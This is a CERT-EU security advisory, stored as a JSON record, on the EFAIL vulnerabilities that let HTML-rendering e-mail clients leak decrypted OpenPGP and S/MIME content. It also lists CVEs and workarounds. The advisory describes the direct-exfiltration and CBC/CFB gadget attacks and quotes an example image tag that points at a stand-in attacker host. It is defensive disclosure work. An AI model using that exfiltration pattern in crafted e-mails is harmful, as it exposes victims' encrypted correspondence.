{
    "file_item": {
        "filepath": "security-advisories",
        "filename": "CERT-EU-SA2018-014.pdf"
    },
    "title": "Vulnerabilities in OpenPGP and S/MIME Client Implementations",
    "serial_number": "2018-014",
    "publish_date": "14-05-2018 15:01:00",
    "description": "On the 14th of May 2018, security researchers released technical details<br>concerning vulnerabilities impacting OpenPGP and S/MIME encryption<br>technologies. These vulnerabilities abuse e-mail clients rendering HTML<br>content when displaying e-mails to exfiltrate plaintext content of<br>OpenPGP or S/MIME encrypted email. Security researchers named those<br>vulnerabilities EFAIL.",
    "url_title": "2018-014",
    "content_markdown": "---\ntitle: 'Vulnerabilities in OpenPGP and S/MIME Client Implementations'\nversion: '1.0'\nnumber: '2018-014'\ndate: 'May 14, 2018'\n---\n\n_History:_\n\n* _14/05/2018 --- v1.0: Initial publication_\n\n# Summary\n\nOn the 14th of May 2018, security researchers released technical details concerning vulnerabilities impacting OpenPGP and S/MIME encryption technologies [1]. These vulnerabilities abuse e-mail clients rendering HTML content when displaying e-mails to exfiltrate plaintext content of OpenPGP or S/MIME encrypted email. Security researchers named those vulnerabilities __EFAIL__.\n\nTo exploit the vulnerabilities, the attacker needs to encapsulate previously captured encrypted content in an HTML e-mail sent to the victim. If the victim's e-mail client is rendering HTML and allows content download from external websites, the decrypted content can be attached to the outgoing request.\n\n\n# Technical Details\n\nThe __EFAIL__ paper describes two types of attacks.\n\nThe first one (Direct Exfiltration) consists of encapsulating the PGP or S/MIME content inside HTML tags (such as `<IMG src=\"http://attacker.eu/\">`). When the client decrypts the encrypted part, the plaintext is concatenated to the HTML tag URL. If the e-mail client is authorized to fetch content from an external source, the HTTP(S) request performed contains the decrypted message.\n\nThe second attack type consists of injecting HTML tags into encrypted plaintext by abusing CBC mode (S/MIME) or CFB mode (OpenPGP). To successfully exploit these flaws, the attacker needs a part of the plaintext message. In most cases, S/MIME and PGP encrypted messages start with specific strings, allowing the attacker to perform the attack. If successful, the plaintext message is concatenated to the HTML tag URL and -- again -- if the e-mail client is authorized to fetch content from an external source, the HTTP(S) request performed contains the decrypted message.\n\nTwo CVEs were provided for the CBC/CFB gadget attacks:\n\n * CVE-2017-17688: OpenPGP CFB gadget attacks\n * CVE-2017-17689: S/MIME CBC gadget attacks\n\n# Products Affected\n\nMost S/MIME and OpenPGP implementations in popular e-mail clients are affected by those vulnerabilities. Some of them, like Enigmail, already patched the vulnerability in their latest version.\n\n# Recommendations\n\nUpgrade to the most recent version of e-mail clients and PGP or S/MIME implementations when available.\n\n## Workarounds\n\nIt is highly recommended to disable HTML rendering in e-mail clients or at least deny downloads from external sources in HTML emails.\n\nFor Outlook 2016:\n\n * in `File` > `Options`\n * `Trust Center` > `Trust Center Settings...`\n * `E-mail security` > Check `Read all standard mail in plaintext` and `Read all digitally signed mail in plaintext`\n\nFor Thunderbird:\n\n * In `View` > `Message Body As`\n * Select `Plain text`\n\n\n# References\n\n[1] <https://efail.de/>\n\n[2] <https://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-17688>\n\n[3] <https://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-17689>\n",
    "content_html": "<p><em>History:</em></p><ul><li><em>14/05/2018 --- v1.0: Initial publication</em></li></ul><h2 id=\"summary\">Summary</h2><p>On the 14th of May 2018, security researchers released technical details concerning vulnerabilities impacting OpenPGP and S/MIME encryption technologies [1]. These vulnerabilities abuse e-mail clients rendering HTML content when displaying e-mails to exfiltrate plaintext content of OpenPGP or S/MIME encrypted email. Security researchers named those vulnerabilities <strong>EFAIL</strong>.</p><p>To exploit the vulnerabilities, the attacker needs to encapsulate previously captured encrypted content in an HTML e-mail sent to the victim. If the victim's e-mail client is rendering HTML and allows content download from external websites, the decrypted content can be attached to the outgoing request.</p><h2 id=\"technical-details\">Technical Details</h2><p>The <strong>EFAIL</strong> paper describes two types of attacks.</p><p>The first one (Direct Exfiltration) consists of encapsulating the PGP or S/MIME content inside HTML tags (such as <code>&lt;IMG src=\"http://attacker.eu/\"&gt;</code>). When the client decrypts the encrypted part, the plaintext is concatenated to the HTML tag URL. If the e-mail client is authorized to fetch content from an external source, the HTTP(S) request performed contains the decrypted message.</p><p>The second attack type consists of injecting HTML tags into encrypted plaintext by abusing CBC mode (S/MIME) or CFB mode (OpenPGP). To successfully exploit these flaws, the attacker needs a part of the plaintext message. In most cases, S/MIME and PGP encrypted messages start with specific strings, allowing the attacker to perform the attack. If successful, the plaintext message is concatenated to the HTML tag URL and -- again -- if the e-mail client is authorized to fetch content from an external source, the HTTP(S) request performed contains the decrypted message.</p><p>Two CVEs were provided for the CBC/CFB gadget attacks:</p><ul><li>CVE-2017-17688: OpenPGP CFB gadget attacks</li><li>CVE-2017-17689: S/MIME CBC gadget attacks</li></ul><h2 id=\"products-affected\">Products Affected</h2><p>Most S/MIME and OpenPGP implementations in popular e-mail clients are affected by those vulnerabilities. Some of them, like Enigmail, already patched the vulnerability in their latest version.</p><h2 id=\"recommendations\">Recommendations</h2><p>Upgrade to the most recent version of e-mail clients and PGP or S/MIME implementations when available.</p><h3 id=\"workarounds\">Workarounds</h3><p>It is highly recommended to disable HTML rendering in e-mail clients or at least deny downloads from external sources in HTML emails.</p><p>For Outlook 2016:</p><ul><li>in <code>File</code> &gt; <code>Options</code></li><li><code>Trust Center</code> &gt; <code>Trust Center Settings...</code></li><li><code>E-mail security</code> &gt; Check <code>Read all standard mail in plaintext</code> and <code>Read all digitally signed mail in plaintext</code></li></ul><p>For Thunderbird:</p><ul><li>In <code>View</code> &gt; <code>Message Body As</code></li><li>Select <code>Plain text</code></li></ul><h2 id=\"references\">References</h2><p>[1] <a rel=\"noopener\" target=\"_blank\" href=\"https://efail.de/\">https://efail.de/</a></p><p>[2] <a rel=\"noopener\" target=\"_blank\" href=\"https://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-17688\">https://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-17688</a></p><p>[3] <a rel=\"noopener\" target=\"_blank\" href=\"https://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-17689\">https://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-17689</a></p>",
    "licence": {
        "title": "Creative Commons Attribution 4.0 International (CC-BY 4.0)",
        "link": "https://creativecommons.org/licenses/by/4.0/",
        "restrictions": "https://cert.europa.eu/legal-notice",
        "author": "The Cybersecurity Service for the Union institutions, bodies, offices and agencies"
    }
}